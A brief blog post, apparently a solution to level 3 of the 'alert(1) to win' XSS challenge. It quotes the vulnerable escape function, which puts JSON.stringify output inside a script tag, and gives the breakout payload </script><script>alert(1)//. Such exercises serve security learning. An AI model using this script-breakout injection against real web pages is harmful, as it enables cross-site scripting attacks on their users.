alert(1) to win 3

function escape(s) {
  s = JSON.stringify(s);
  return '<script>console.log(' + s + ');</script>';
}
JSON.stringify()将 \" 都转义了,只能:
</script><script>alert(1)//

 

 
posted @ 2017-12-29 15:24  S3c0ldW4ng  阅读(191)  评论(0编辑  收藏  举报